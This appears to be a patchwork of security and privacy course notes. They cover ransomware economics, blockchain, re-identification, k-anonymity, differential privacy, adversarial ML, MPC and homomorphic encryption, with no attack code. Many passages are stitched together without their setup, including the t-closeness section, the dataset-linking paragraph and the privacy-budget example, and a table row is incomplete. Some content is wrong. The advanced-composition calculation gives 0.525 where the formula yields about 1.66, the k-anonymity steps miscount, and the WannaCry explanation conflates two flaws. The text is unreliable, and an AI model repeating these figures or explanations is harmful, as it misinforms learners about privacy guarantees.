Modern ransomware (REvil, DarkSide, LockBit) operates as Ransomware-as-a-Service (RaaS): the ransomware authors lease the malware and infrastructure to affiliates who conduct intrusions and split the ransom. Ransoms are denominated in Bitcoin or Monero for pseudonymity.
Double extortion emerged around 2019: attackers not only encrypt files but exfiltrate data and threaten to publish it, giving victims an additional reason to pay even if they have backups. The correct defensive posture includes offline backups (air-gapped or immutable), network segmentation, and IR planning.
Encryption: WannaCry generates a per-file AES-128 key, encrypts the file in CBC mode, then RSA-encrypts the AES key with the attacker’s public key (RSA-2048). Only the attacker’s private key can recover the AES keys, and hence the files. The AES-128 with fresh per-file keys and CBC mode was reasonably implemented — there was no practical weakness in this layer.
The catastrophic flaw: WannaCry used the Windows CryptGenRandom API to generate AES keys. On certain versions of Windows XP, this API had a known weakness where the PRNG state was poorly seeded. Security researchers (Guinet et al.) discovered that WannaCry generated the AES keys but also kept the prime factorisation of the RSA private key temporarily in memory and did not zero-clear it. By scanning process memory before files were deleted, researchers built a tool (WannaKey) that could reconstruct the RSA private key from memory — allowing decryption without paying the ransom, on unpatched XP systems that had not been rebooted.
The WannaCry kill switch — a single hardcoded domain that the worm queried and halted if resolvable — was discovered by researcher Marcus Hutchins, who registered the domain for $10.69 and thereby activated the kill switch globally, halting the spread within hours of its discovery. This single design oversight (the kill switch existed to detect analysis sandboxes, which often redirect all DNS queries to a local host) allowed the worm’s spread to be arrested without defeating its encryption.
The economics are striking: the Colonial Pipeline attack (DarkSide, 2021) resulted in a ransom of 75 Bitcoin (~$4.4M at the time), of which approximately 63.7 Bitcoin was later recovered by the FBI using a private key obtained through an investigation. The recovery demonstrated that Bitcoin is pseudonymous, not anonymous — blockchain analysis firms (Chainalysis, Elliptic) can trace transaction flows through the public ledger. Monero, which uses ring signatures, stealth addresses, and confidential transactions to provide strong anonymity, has become increasingly preferred for ransomware payments precisely because it is harder to trace. The OFAC (Office of Foreign Assets Control) has sanctioned specific cryptocurrency addresses associated with ransomware operators, making it illegal for US entities to pay ransoms to those addresses — though enforcement against international affiliates remains difficult.
Blockchain and Bitcoin
The Bitcoin whitepaper (Nakamoto 2008) describes a decentralised, trustless ledger secured by proof-of-work.
Data structure: transactions are grouped into blocks. Each block contains a Merkle tree of transactions (efficient membership proofs), a hash pointer to the previous block, a nonce, and a timestamp. The chain of hashes makes tampering computationally infeasible: altering a past block requires re-mining that block and all subsequent blocks.
Proof-of-Work: to add a block, a miner must find a nonce such that \(H(\text{block header}) < \text{target}\). The target is adjusted every 2016 blocks so that blocks arrive approximately every 10 minutes. Mining is probabilistic; the expected work grows exponentially as the target decreases.
The UTXO (Unspent Transaction Output) model tracks coin ownership: each transaction consumes UTXOs as inputs and creates new UTXOs as outputs. There are no accounts; identity is a public key.
Double-spend attack (51% attack): an adversary controlling more than half the network’s hash rate can build a longer secret chain and later broadcast it, reversing confirmed transactions. The probability of success decreases exponentially with the number of confirmations.
Ethereum and Proof-of-Stake
Ethereum extends Bitcoin with smart contracts — Turing-complete programs stored and executed on-chain in the EVM (Ethereum Virtual Machine). Contracts are written in Solidity. Each computation step costs gas, preventing infinite loops and incentivising efficiency.
The Ethereum Merge (September 2022) transitioned Ethereum from proof-of-work to Proof-of-Stake. Validators replace miners: to propose and attest to blocks, validators stake 32 ETH as collateral. Dishonest behaviour is punished by slashing (burning staked ETH). Energy consumption fell by approximately 99.95%.
Known Ethereum smart contract vulnerabilities:
- Reentrancy: a contract calls an external contract before updating its state; the external contract re-enters and drains funds. The DAO hack (2016) exploited this, stealing approximately 60M USD.
- Integer overflow/underflow: Solidity 0.7 introduced automatic overflow checking; earlier contracts used SafeMath libraries.
- Front-running (MEV): miners (now validators) can observe pending transactions and insert their own transactions ahead of them.
Mining Pool Centralisation
Solo mining has extremely high variance: a miner with 0.1% of hash rate expects one block every 16 days on average but may wait months. Mining pools aggregate hash power, sharing rewards proportionally to submitted work (shares). The stratum protocol coordinates miners with the pool server.
The consequence is extreme centralisation: a handful of pools (AntPool, F2Pool, Foundry) collectively control well over 50% of Bitcoin hash rate. Ghash.io briefly exceeded 50% in 2014, demonstrating the theoretical feasibility of a 51% attack. This centralisation undermines Bitcoin’s decentralisation premise.
Chapter 6: Inference Attacks and Syntactic Privacy
The Re-identification Problem
Releasing data with direct identifiers removed (name, SSN, email) is intuitively “anonymised” but frequently inadequate. Quasi-identifiers — combinations of seemingly innocuous attributes — can uniquely identify individuals.
AOL search logs (2006): AOL released 20 million search queries with user IDs replaced by random numbers. New York Times reporters identified user 4417749 as Thelma Arnold by correlating her searches for her name, neighbours, and medical conditions.
Netflix Prize dataset (Narayanan and Shmatikoff 2008): Netflix released 500,000 users’ movie ratings with usernames replaced by random IDs. Using the public IMDb database as auxiliary information, just two movie ratings with approximate dates were sufficient to uniquely identify 99% of records in the dataset. The attack used a de-anonymisation algorithm based on the principle that an individual’s ratings are a unique fingerprint.
NYC Taxi dataset (2014): the NYC Taxi and Limousine Commission released trip data with medallion numbers hashed via MD5. Because the space of valid medallion numbers was small (a few hundred thousand), GPU-based rainbow tables reversed all hashes in hours, linking trips to specific taxis and drivers.
Dataset Reconstruction Attacks
Given a statistical database that answers aggregate queries (counts, sums, means), can an attacker reconstruct the individual records? The Dinur-Nissim reconstruction theorem (2003) shows that if an adversary can issue \(O(n \log n)\) queries over \(n\) binary-valued records and observes the responses with no noise added, then a near-exact reconstruction of the database is possible via linear programming relaxation. This implies that publishing accurate statistics without any noise is fundamentally incompatible with privacy — a key motivator for differential privacy.
k-Anonymity
k-Anonymity prevents linking attacks when the adversary knows an individual’s quasi-identifiers. However, it has critical weaknesses.
| Name | Age | Gender | ZIP Code | Salary |
|---|---|---|---|---|
| Alice | 30 | F | 10001 | 80K |
| Bob | 32 | M | 10001 | 90K |
| Carol | 28 | F | 10002 | 75K |
The quasi-identifiers are \(\{\text{age}, \text{gender}, \text{ZIP code}\}\). As-is, each record is unique on these quasi-identifiers — an adversary who knows Alice’s age, gender, and ZIP can immediately identify her row and infer her salary.
To achieve \(k=2\) anonymity, we apply two transformations: (1) generalise age to the decade range [25–35]; (2) suppress the gender column entirely; (3) generalise ZIP code to the prefix 100** (masking the last two digits). The transformed dataset is:
| Age Range | Gender | ZIP Prefix | Salary |
|---|---|---|---|
| [25–35] | — | 100** | 80K |
| [25–35] | — | 100** | 90K |
| [25–35] | — | 100** | 75K |
Every record now matches all three other records on the quasi-identifiers — in fact we have \(k = 3\) since all three fall in the same generalised equivalence class. A linking attack using only (age range, ZIP prefix) cannot distinguish Alice from Bob or Carol.
However, \(k\)-anonymity does not protect the sensitive attribute. Alice’s salary of 80K is still unique within the equivalence class. An attacker who knows that a person in this class earns 80K can immediately identify them. This residual disclosure is what \(\ell\)-diversity and \(t\)-closeness attempt to address: they require that the sensitive attribute (salary) is sufficiently diverse or distributed within each equivalence class, not merely that the quasi-identifiers are generalised.
Homogeneity attack: if all \(k\) records in an equivalence class share the same sensitive attribute value, the adversary learns that value with certainty, even without a linking attack.
Background knowledge attack: if the adversary knows something about an individual that further constrains which records in the equivalence class could be theirs, even diverse sensitive values may be disclosed.
Now an adversary links the two datasets on ZIP code. The combined quasi-identifier is \(\{\text{gender}, \text{age}, \text{ZIP code}\}\). Even if each individual dataset had \(k=3\), the combined equivalence classes may now contain only 1 or 2 records — uniquely identifying individuals. The k-anonymity guarantee for each dataset provides no protection against this composition attack. This failure mode is precisely why k-anonymity has no meaningful composition theorem, and why differential privacy — which composes predictably — is preferred.
l-Diversity
Distinct 3-diversity requires each equivalence class to contain all three diagnoses (cancer, flu, cold) — at least one record with each. Under this constraint, even knowing the target’s equivalence class, the adversary can only say the diagnosis is one of three possibilities, limiting information gain. However, l-diversity still does not account for the overall distribution: if 95% of the population has cancer, then even a “diverse” equivalence class with 1 cancer and 2 flu/cold records still reveals that the target probably has cancer. This motivates t-closeness.
t-Closeness
Shokri et al. (2017) operationalised this into a full attack pipeline. The attacker first trains \(k = 64\) shadow models that mimic the target model’s behaviour — each shadow model is trained on a different random subset of a dataset drawn from the same distribution as the target’s training data. For each record in each shadow model’s training and test sets, the attacker observes the confidence vector \(f_\text{shadow}(x) \in [0,1]^C\) (where \(C\) is the number of classes). Shadow models trained on \(x\) tend to produce higher-confidence, more peaked vectors; shadow models not trained on \(x\) produce flatter, lower-confidence outputs. These (confidence vector, member/non-member) pairs become the training data for a binary attack classifier.
Against the target model, the attacker queries \(f_\theta(x)\), feeds the resulting confidence vector to the attack classifier, and obtains a membership prediction. Shokri et al. achieved over 80% attack accuracy on neural networks trained on Purchase-100 and Texas-100 hospital discharge datasets — well above the 50% random baseline. Defences include: output regularisation (temperature scaling, label smoothing), restricting the API to top-1 class labels only (removing confidence scores), and DP-SGD, which provides formal membership inference resistance proportional to \(e^\varepsilon\). The formal connection is tight: any \((\varepsilon, \delta)\)-DP mechanism bounds the adversary’s membership advantage to at most \(e^\varepsilon - 1 + \delta\).
Limitations of Syntactic Approaches
Syntactic privacy models share fundamental shortcomings. They provide no formal adversary model and offer no composability: releasing two k-anonymous datasets can jointly violate privacy. The set of quasi-identifiers must be specified in advance; in a world of rich auxiliary data, virtually any attribute combination can serve as a quasi-identifier. These limitations motivate the rigorous probabilistic framework of differential privacy.
Chapter 7: Differential Privacy and Private Machine Learning
Intuition and Formal Definition
Differential privacy formalises the intuition that no individual’s participation in a dataset should significantly change what an analyst can learn. Think of it as a promise: “your data could have been in or out of the dataset, and the output barely changes either way.”
The two datasets \(D\) and \(D'\) are called neighbouring or adjacent. In the “add/remove” model, \(D'\) is obtained from \(D\) by adding or removing one person’s record. In the “substitution” model, \(D'\) replaces one person’s record with a different one. The two models differ slightly in their noise requirements but are equivalent up to a factor of 2 in \(\varepsilon\).
From the student’s perspective, privacy is guaranteed: regardless of the true answer, the student’s reported response is YES with probability at least \(1/4\) and NO with probability at least \(1/4\). No single response can be taken as definitive evidence. Formally, let the true probability of cheating be \(p\). The expected fraction of YES responses is
\[ \Pr[\text{YES}] = p \cdot \tfrac{1}{2} + (1-p) \cdot \tfrac{1}{4} + p \cdot \tfrac{1}{4} = \tfrac{p}{2} + \tfrac{1}{4}. \]Let \(\hat{q}\) denote the observed fraction of YES answers. Solving for \(p\): \(p = 2\hat{q} - \tfrac{1}{2}\). This is an unbiased estimator; with \(n\) students the standard error is \(O(1/\sqrt{n})\) — only a constant factor worse than direct surveying.
What is the formal DP guarantee? For any individual, the ratio of probabilities of saying YES versus NO is at most \(3:1\) (truthful YES has probability \(3/4\), truthful NO has probability \(1/4\)). Therefore this mechanism is \(\varepsilon\)-DP in the local model with \(\varepsilon = \ln 3 \approx 1.1\) — a strong, interpretable guarantee. Randomised response is arguably the oldest known local DP mechanism, predating the formal definition by four decades.
Sensitivity and Basic Mechanisms
For a privacy parameter \(\varepsilon = 0.5\), the Laplace mechanism adds noise \(Z \sim \mathrm{Lap}(0, 1/0.5) = \mathrm{Lap}(0, 2)\). Suppose the true count is \(f(D) = 150\). The mechanism outputs \(150 + Z\), where \(Z\) might take values such as \(-1.7\) (giving output \(148.3\)) or \(+2.7\) (giving \(152.7\)). The expected absolute error is \(\mathbb{E}[|Z|] = b = 1/\varepsilon = 2\). Increasing \(\varepsilon\) to 1.0 would halve the noise scale to \(\mathrm{Lap}(0,1)\), halving the expected error — at the cost of weaker privacy.
The analyst rounds the output to the nearest integer and reports it as the approximate count. Crucially, with high probability the output is within a few units of the true count, yet the guarantee holds: for any two adjacent datasets \(D, D'\), the ratio of output probabilities is bounded by \(e^\varepsilon = e^{0.5} \approx 1.65\).
Exponential mechanism (McSherry-Talwar): for non-numeric outputs, sample an output \(r\) with probability proportional to \(\exp(\varepsilon \cdot q(D, r) / 2\Delta q)\), where \(q\) is a quality score. Achieves \(\varepsilon\)-DP while maximising expected quality.
Composition Theorems
Differential privacy composes gracefully, a major advantage over syntactic approaches.
Sequential composition: running \(k\) mechanisms \(M_1, \ldots, M_k\) each with budget \(\varepsilon_i\) on the same dataset yields \((\sum \varepsilon_i)\)-DP.
Parallel composition: if each mechanism \(M_i\) operates on a disjoint subset of the data, the combined mechanism is \(\max_i \varepsilon_i\)-DP.
Advanced composition (Dwork-Rothblum-Vadhan): for \(k\) applications of an \((\varepsilon, \delta)\)-DP mechanism, the composition achieves approximately \((\varepsilon \sqrt{2k \log(1/\delta')}, k\delta + \delta')\)-DP — significantly better than the naive \(k\varepsilon\) bound.
The moments accountant (Abadi et al.) and Rényi DP framework (Mironov) give even tighter composition bounds, enabling practical DP-ML training with reasonable noise levels.
Intuitively: if a record is only included in the subsample with probability \(\gamma\), then with probability \(1 - \gamma\) the mechanism does not even see that record, bounding its influence. This privacy amplification lemma is exploited heavily in two settings: (1) DP-SGD subsamples a mini-batch of size \(B\) from \(n\) training examples at each gradient step, giving amplification factor \(\gamma = B/n\); (2) Apple’s local DP deployment collects data from only a fraction of devices per day, obtaining amplification from the subsampling. The amplification lemma means that a mechanism with moderate per-step \(\varepsilon\) can achieve strong end-to-end guarantees after many steps, which is what makes differentially private machine learning feasible.
If the company wanted to release a 11th statistic, it would have already consumed its full “privacy budget” (assuming the pre-set limit was \(\varepsilon_{\text{total}} = 1.0\)). To release more queries while remaining within budget, the company can either increase the noise scale (lowering accuracy) or use advanced composition, which for 10 mechanisms with \(\varepsilon = 0.1\) and \(\delta = 10^{-6}\) gives a combined budget of approximately \(0.1\sqrt{20 \ln(10^6)} \approx 0.1 \times 5.25 = 0.525\) — much better than the naive bound of 1.0, enabling roughly 4× more queries within the same budget. This is the practical meaning of the “privacy budget” metaphor: you can only make finitely many queries before the cumulative privacy loss becomes unacceptable.
Proof sketch. Let \(S \subseteq \mathcal{S}\) be any measurable set. Observe that \(\{f \circ M(D) \in S\} = \{M(D) \in f^{-1}(S)\}\). Since \(M\) is \((\varepsilon,\delta)\)-DP, applying the DP guarantee to the measurable set \(f^{-1}(S) \subseteq \mathcal{R}\) gives: \[ \Pr[f(M(D)) \in S] = \Pr\!\left[M(D) \in f^{-1}(S)\right] \leq e^\varepsilon \Pr\!\left[M(D') \in f^{-1}(S)\right] + \delta = e^\varepsilon \Pr[f(M(D')) \in S] + \delta. \] The key insight is that \(f^{-1}(S)\) is simply another measurable subset of \(\mathcal{R}\), so the DP guarantee applies to it directly. Since this holds for all \(S\), \(f \circ M\) is \((\varepsilon, \delta)\)-DP.
Post-processing immunity has major practical consequences: any downstream computation on a DP output — whether it is averaging, rounding, running a classification algorithm, or publishing a report — cannot degrade the privacy guarantee. Privacy is “baked in” to the output of \(M\), regardless of how the output is subsequently used.
Local vs. Central Differential Privacy
In the local model, there is no trusted curator. Each individual applies a DP randomiser to their own data before sending it to the collector, who aggregates the noisy reports. Because each individual’s report is already \(\varepsilon\)-DP, the collector learns nothing beyond what is deducible from the noisy reports. However, the price is steep: to estimate a simple proportion (fraction of users with a property), the standard deviation of the local DP estimator scales as \(\Theta(e^\varepsilon / (e^\varepsilon - 1)) \cdot 1/\sqrt{n}\), whereas the central DP estimator has error \(O(1/(\varepsilon n))\) — effectively, local DP requires \(\Omega(e^{2\varepsilon})\) times as many users to achieve the same accuracy. Google’s RAPPOR (2014) and Apple’s iOS keyboard/emoji collection use local DP, accepting higher noise in exchange for not needing to trust a central server.
Real-World Deployments
| Organisation | Application | \(\varepsilon\) |
|---|---|---|
| US Census Bureau 2020 | Decennial census publication | \(\approx 17.14\) total budget |
| Google (RAPPOR) | Chrome browser statistics | Varies per query |
| Apple (iOS) | Keyboard suggestions, emoji | \(\approx 8\) (estimated) |
| Audience engagement API | Not disclosed |
The Census deployment sparked debate: an \(\varepsilon = 17.14\) budget distributed across many publications results in substantial noise on small geographic areas, affecting redistricting and federal funding allocation.
Differentially Private Machine Learning
Training a neural network on sensitive data risks memorisation: models can inadvertently encode and leak individual training examples (membership inference, model inversion).
DP-SGD (Abadi et al. 2016): makes stochastic gradient descent differentially private:
- Per-example gradient clipping: clip each individual’s gradient to L2 norm \(C\) (bounding sensitivity).
- Noise addition: add Gaussian noise \(\mathcal{N}(0, \sigma^2 C^2 \mathbf{I})\) to the summed gradient.
- Moments accountant: track \(\varepsilon\) accumulation across training steps with tight composition.
The privacy-utility trade-off is significant: DP-SGD models often have lower accuracy than non-private counterparts, especially at small \(\varepsilon\). Privacy amplification by subsampling (mini-batches) and amplification by shuffling help recover some utility.
Each step proceeds as follows: (1) sample a mini-batch \(S\) of \(B = 256\) examples uniformly at random from the \(n = 10{,}000\) training examples (subsampling rate \(\gamma = 256/10{,}000 = 0.0256\)); (2) compute the gradient of the loss for each example individually (per-example gradients, not the standard batch gradient); (3) clip each per-example gradient vector to L2 norm \(\leq C = 1.0\), bounding the contribution of any single training example; (4) sum the clipped gradients and add Gaussian noise \(\mathcal{N}(0,\, \sigma^2 C^2 \mathbf{I}) = \mathcal{N}(0,\, (1.1)^2 \mathbf{I})\); (5) divide by \(B\) to form the noisy gradient estimate and update model parameters.
Privacy cost: using the moments accountant (or the Rényi DP accounting in PyTorch Opacus), \(T = 2{,}000\) steps with these parameters yields approximately \((\varepsilon, \delta) = (3.0, 10^{-5})\)-DP. Apple’s keyboard next-word prediction and Google’s GBoard emoji suggestion models are trained with variants of this procedure, typically targeting \(\varepsilon \approx 8\) (a more relaxed privacy guarantee that allows higher accuracy). At \(\varepsilon = 3\), the model typically loses 2–5 percentage points of accuracy relative to non-private training, depending on the architecture and dataset size. The accuracy gap shrinks as \(n\) grows: larger datasets tolerate more noise.
RDP has three key properties that make it the preferred accounting framework for DP-ML: (1) tight sequential composition — if \(M_1\) satisfies \((\alpha, \varepsilon_1)\)-RDP and \(M_2\) satisfies \((\alpha, \varepsilon_2)\)-RDP, then \((M_1, M_2)\) satisfies \((\alpha, \varepsilon_1 + \varepsilon_2)\)-RDP; (2) conversion to \((\varepsilon, \delta)\)-DP — any \((\alpha, \varepsilon_\alpha)\)-RDP mechanism is also \((\varepsilon_\alpha + \frac{\log(1/\delta)}{\alpha - 1}, \delta)\)-DP for any \(\delta > 0\); (3) Gaussian mechanism — the Gaussian mechanism with noise \(\mathcal{N}(0, \sigma^2)\) applied to a function with sensitivity 1 satisfies \((\alpha, \frac{\alpha}{2\sigma^2})\)-RDP. Combining (1) and (3): after \(T\) steps, privacy cost is \((\alpha, T\alpha / (2\sigma^2))\)-RDP, converted to \((\varepsilon, \delta)\)-DP by (2). This three-step accounting — implemented in PyTorch Opacus and TensorFlow Privacy — is how practitioners compute the DP guarantee for large-scale model training.
The deployment triggered an intense methodological debate. Demographers argued that the noise introduced at the block level — the smallest geographic unit — was large enough to distort small-area statistics critical for congressional redistricting and federal funding allocation. Some researchers found that small minority communities’ population counts were significantly distorted, potentially affecting their political representation. The Census Bureau conducted multiple accuracy assessments and adjusted parameters in response. The episode illustrates a tension that is fundamental to applied DP: the mathematics determines the privacy-accuracy tradeoff for a given \(\varepsilon\), but choosing \(\varepsilon\) is a societal and political decision, not a purely technical one. There is no universally “correct” \(\varepsilon\).
Federated learning trains models on data that never leaves user devices. The server aggregates model updates (gradients), not raw data. Combining federated learning with DP-SGD (and secure aggregation) provides stronger end-to-end privacy guarantees.
The Exponential Mechanism and Report Noisy Max
The Laplace and Gaussian mechanisms apply to numeric queries. For non-numeric outputs — selecting a record from a database, generating a private synthetic dataset, choosing a word from a vocabulary — the exponential mechanism is the canonical approach.
The sensitivity is \(\Delta q = 1\) (adding one person changes the rank of any value by at most 1). The exponential mechanism samples \(r\) with probability \(\propto \exp(\varepsilon \cdot q(D,r) / 2)\). For large \(\varepsilon\), probability concentrates sharply around the true median; for small \(\varepsilon\), the distribution spreads. The expected error is \(O(\log(100) / \varepsilon) = O(\ln 100 / \varepsilon) \approx 4.6/\varepsilon\) — logarithmic in the range size, not linear. Compare with the Laplace mechanism applied to the rank index: Laplace noise on a rank would need clipping and has no natural sensitivity-preserving formulation for the median. The exponential mechanism is the principled general tool.
Local DP Mechanisms in Practice
The most deployed local DP mechanisms are designed for frequency estimation — estimating how often each value in a domain appears across a population.
RAPPOR achieves \(\varepsilon\)-LDP with \(\varepsilon = 2\ln\frac{1-q}{p}\) from the instantaneous randomisation step. It was deployed to collect statistics on Chrome’s home page URL, default search engine, and software configuration — data types where direct logging would be considered highly privacy-invasive, but where population-level statistics are valuable for product improvement.
Adversarial Machine Learning
Models trained on sensitive data are themselves privacy and security threats.
Evasion attacks craft adversarial examples: inputs perturbed imperceptibly (to humans) that cause misclassification. FGSM (Goodfellow et al. 2014): perturb input by \(\eta \cdot \text{sign}(\nabla_x \mathcal{L})\). Carlini-Wagner attack: optimisation-based; finds minimal perturbation achieving target misclassification. Adversarial robustness and clean accuracy are often in tension.
Poisoning attacks corrupt the training data. Backdoor attacks embed a trigger (e.g., a specific pixel pattern) such that the model predicts a target class whenever the trigger is present, while behaving normally on clean inputs.
Model extraction: query the model API to reconstruct a functionally equivalent model, stealing intellectual property and enabling white-box attacks against what was a black-box system.
Model inversion: given a model that outputs class probabilities, recover approximate training examples. Fredrikson et al. (2015) reconstructed facial images from a face recognition API.
Membership inference (Shokri et al. 2017): determine whether a specific record was in the training set by exploiting the observation that models tend to have higher confidence on training examples. DP-SGD provides formal membership inference resistance.
This connection to differential privacy is not coincidental: the Gaussian mechanism is the core of both randomised smoothing and DP-SGD. The same noise distribution that provides privacy amplification in DP-SGD provides certified robustness in randomised smoothing. The \((\varepsilon, \delta)\)-DP guarantee of the Gaussian mechanism directly implies a certified robustness radius. This deep connection has spurred research into “privacy as robustness” — models trained with DP-SGD are more robust to adversarial examples and data poisoning as a side effect of the clipping and noising procedures, beyond the formal membership inference guarantee.
Chapter 8: Multi-Party Computation, Homomorphic Encryption, and Surveillance
Secret Sharing
Shamir’s secret sharing (1979) solves the problem of distributing a secret \(s\) among \(n\) parties such that any \(k\) can reconstruct it but any \(k-1\) learn nothing. The construction uses polynomial interpolation over \(\mathbb{F}_p\):
Choose a random polynomial \(f(x) = s + a_1 x + \cdots + a_{k-1} x^{k-1}\) with \(f(0) = s\). Distribute \((i, f(i))\) to party \(i\). Any \(k\) points uniquely determine \(f\) (and hence \(s\)) by Lagrange interpolation; fewer than \(k\) points are statistically independent of \(s\).
Applications include distributed key management (requiring multiple administrators to reconstruct a root key), secure voting, and as a building block in MPC.
Choose a random degree-\((k-1) = 1\) polynomial with \(f(0) = s = 42\). Pick the random coefficient \(a_1 = 7\). The polynomial is \(f(x) = 42 + 7x\).
Compute the three shares:
\[ s_1 = f(1) = 42 + 7 = 49, \qquad s_2 = f(2) = 42 + 14 = 56, \qquad s_3 = f(3) = 42 + 21 = 63. \]Distribute share \(s_i\) to party \(i\). Now reconstruct from any two, say parties 1 and 2 using Lagrange interpolation:
\[ f(0) = s_1 \cdot \frac{0 - 2}{1 - 2} + s_2 \cdot \frac{0 - 1}{2 - 1} = 49 \cdot \frac{-2}{-1} + 56 \cdot \frac{-1}{1} = 49 \times 2 - 56 = 98 - 56 = 42. \checkmark \]Verify from parties 1 and 3:
\[ f(0) = 49 \cdot \frac{0-3}{1-3} + 63 \cdot \frac{0-1}{3-1} = 49 \cdot \frac{-3}{-2} + 63 \cdot \frac{-1}{2} = \frac{147}{2} - \frac{63}{2} = \frac{84}{2} = 42. \checkmark \]A single share, say \(s_1 = 49\), reveals nothing: for any claimed secret \(s' \in \{0, 1, \ldots, 100\}\) there exists a polynomial \(g(x) = s' + a_1' x\) with \(g(1) = 49\) (namely \(a_1' = 49 - s' \bmod 101\)), so every secret is equally consistent with the observed share. This is the perfect secrecy of Shamir’s scheme.
Multi-Party Computation
MPC enables \(n\) parties holding private inputs \(x_1, \ldots, x_n\) to jointly compute a function \(f(x_1, \ldots, x_n)\) while revealing only the output — no party learns another’s input beyond what is implied by the output.
| \(a\) | \(b\) | \(a \wedge b\) |
|---|---|---|
| 0 | 0 | 0 |
| 0 | 1 | 0 |
| 1 | 0 | 0 |
| 1 | 1 | 1 |
Alice creates four ciphertexts: \(\mathsf{Enc}_{k_a^0, k_b^0}(k_{\text{out}}^0)\), \(\mathsf{Enc}_{k_a^0, k_b^1}(k_{\text{out}}^0)\), \(\mathsf{Enc}_{k_a^1, k_b^0}(k_{\text{out}}^0)\), \(\mathsf{Enc}_{k_a^1, k_b^1}(k_{\text{out}}^1)\), and shuffles them randomly. She sends Bob the shuffled garbled table and her label for her input \(a\) (e.g., if \(a=1\), she sends \(k_a^1\)). Bob uses oblivious transfer to obtain \(k_b^{b}\) — the label for his input \(b\) — without Alice learning \(b\). Bob now tries all four ciphertexts; exactly one decrypts successfully (the one matching the labels he holds), revealing \(k_{\text{out}}^{a \wedge b}\). Alice tells Bob which label corresponds to output 1. Bob learns the output \(a \wedge b\) but cannot determine \(a\); Alice learns nothing about \(b\).
Oblivious transfer (OT): a protocol where the sender holds two messages \(m_0, m_1\) and the receiver chooses \(b \in \{0,1\}\); the receiver learns \(m_b\) without learning \(m_{1-b}\), and the sender does not learn \(b\). OT is a fundamental building block for MPC.
Security models: semi-honest (honest-but-curious) adversaries follow the protocol but try to infer additional information from their view; malicious adversaries can deviate arbitrarily. Secure MPC against malicious adversaries requires additional mechanisms (e.g., zero-knowledge proofs of correct behaviour), incurring higher overhead.
Oblivious RAM (ORAM) hides the access pattern by ensuring that the sequence of physical memory accesses observed by the server is computationally indistinguishable from a uniformly random sequence, regardless of the logical access pattern. The key insight of Path ORAM (Stefanov et al. 2013) is to arrange data in a binary tree of \(N\) leaves, map each block to a randomly chosen leaf, and always read and re-encrypt the entire path from root to that leaf on each access — even if only one block on the path is relevant. After each access, the block is remapped to a fresh random leaf and re-encrypted.
Cost: Path ORAM requires reading \(O(\log N)\) blocks per logical access, so the overhead is \(O(\log N)\) in communication and \(O(\log^2 N)\) with a client-side stash. This is far cheaper than naive approaches (downloading the entire database). ORAM is used in practice by the Signal Protocol for private contact discovery (clients can look up whether their contacts use Signal without Signal learning which contacts they queried), and is a building block in secure enclave computing (Intel SGX programs use ORAM to prevent cache side-channel attacks).
The Schnorr identification protocol is a simple ZKP for discrete log: to prove knowledge of \(x\) with \(h = g^x\), the prover sends \(r = g^v\) (random \(v\)), the verifier challenges with \(c\), and the prover responds with \(s = v - cx \bmod q\). The verifier checks \(g^s h^c = r\). Modern systems use non-interactive ZKPs via the Fiat-Shamir transform (replace the verifier’s random challenge with a hash of the commitment).
Industrial-scale ZK systems go far beyond identification: zk-SNARKs (succinct non-interactive arguments of knowledge) prove arbitrary NP computations in \(O(1)\) proof size, used by the Zcash cryptocurrency (private transactions) and Ethereum layer-2 rollups. zk-STARKs are transparent (no trusted setup) and post-quantum secure, used by StarkNet. Applications: (1) privacy-preserving blockchains; (2) proving a machine learning model was trained on certified data without revealing the training data; (3) age verification — proving “I am over 18” without revealing the birthdate, using a ZKP over the certificate-signed birthdate from a government-issued ID.
Federated learning reduces privacy risk but does not eliminate it: gradient inversion attacks (Zhu et al. 2019) demonstrated that a curious server can, in some settings, reconstruct training images pixel-by-pixel from a single gradient update. The attack formulates reconstruction as an optimisation problem: find input \(x'\) such that \(\nabla_\theta \mathcal{L}(f_\theta(x'), y') \approx \nabla_\theta \mathcal{L}(f_\theta(x), y)\). On small models and batches of 1–8 images, reconstruction is near-perfect. Defences include larger batch sizes (gradients of many examples cancel), DP-SGD (noising gradients), and secure aggregation (the server only sees the sum of all device gradients, never any individual gradient). Combining federated learning with DP-SGD and secure aggregation gives end-to-end formal privacy guarantees — the architecture deployed by Apple (QuickType keyboard) and Google (GBoard).
Homomorphic Encryption
Homomorphic encryption allows computation on encrypted data. Given encryptions \(\text{Enc}(a)\) and \(\text{Enc}(b)\), a server can compute \(\text{Enc}(f(a, b))\) for some class of functions \(f\), without learning \(a\) or \(b\).
| Type | Supported operations | Examples |
|---|---|---|
| Partial (PHE) | Addition or multiplication | Paillier (additive), ElGamal (multiplicative) |
| Somewhat (SHE) | Bounded-depth circuits | BFV, BGV |
| Fully (FHE) | Any circuit | Gentry 2009 (ideal lattices); CKKS (approximate reals) |
Gentry’s FHE construction (2009) was a theoretical breakthrough: he showed that somewhat homomorphic encryption could be made fully homomorphic by bootstrapping — homomorphically evaluating the decryption circuit to refresh the noise. Modern FHE schemes (CKKS for approximate arithmetic on real/complex numbers, BFV/BGV for exact integers) are based on the Learning With Errors (LWE) or Ring-LWE hardness assumption.
The practical landscape has improved substantially. Current FHE schemes target specific workloads: CKKS (Cheon-Kim-Kim-Song, 2017) supports approximate arithmetic over real and complex numbers — well-suited for machine learning inference on encrypted data. BFV and BGV support exact integer arithmetic — useful for private statistics. TFHE enables gate-by-gate bootstrapping, fast for small circuits. Google (FHE transpiler), Microsoft (SEAL), and IBM (HElib) all maintain production-grade FHE libraries. Practical deployments include private contact discovery (computing set intersections without revealing either party’s contact list), private genomic analysis, and outsourced ML inference where the server learns neither the model nor the query. Overhead remains large (100× to 10000× versus plaintext), but specialised hardware accelerators and algorithmic improvements continue to close the gap.
FHE overhead remains large: 100× to 10000× slower than plaintext computation. Applications include medical data analysis without exposing patient records to cloud providers, private set intersection, and outsourced ML inference.
Private Information Retrieval
PIR allows a client to retrieve the \(i\)-th element from a database of \(n\) elements without the server learning \(i\). Trivial PIR requires downloading the whole database (communication cost \(O(n)\)).
Information-theoretic PIR with \(k \geq 2\) non-colluding servers achieves polylogarithmic communication (Chor et al. 1995). Computational PIR with a single server uses HE to achieve sublinear communication under cryptographic assumptions. The communication-computation trade-off is an active research area; deployments include private browsing history and private contact discovery (Signal uses PIR-adjacent techniques for contact intersection).
